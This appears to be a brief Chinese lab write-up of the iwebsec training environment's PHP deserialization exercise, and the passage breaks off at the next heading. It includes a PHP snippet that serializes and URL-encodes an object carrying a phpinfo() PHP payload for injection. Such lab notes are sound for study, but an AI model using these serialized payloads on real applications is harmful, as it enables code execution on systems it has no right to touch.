iwebsec_反序列化漏洞
2024-11-29 12:56:41 # iwebsec

01-反序列化漏洞示例1

addslashes() 转义

stripslashes() 删除转义

1
2
3
4
5
6
7
8
9
10
11
12
<?php
class a
{
var $test;
public function __construct()
{
$this->test = '<?php phpinfo();?>';
}
}

echo urlencode(serialize(new a()));

但是,由于源码的hello.php使用的路径与搭建环境时使用docker环境不同,导致该地址无法访问到该文件,学习知识就好

02-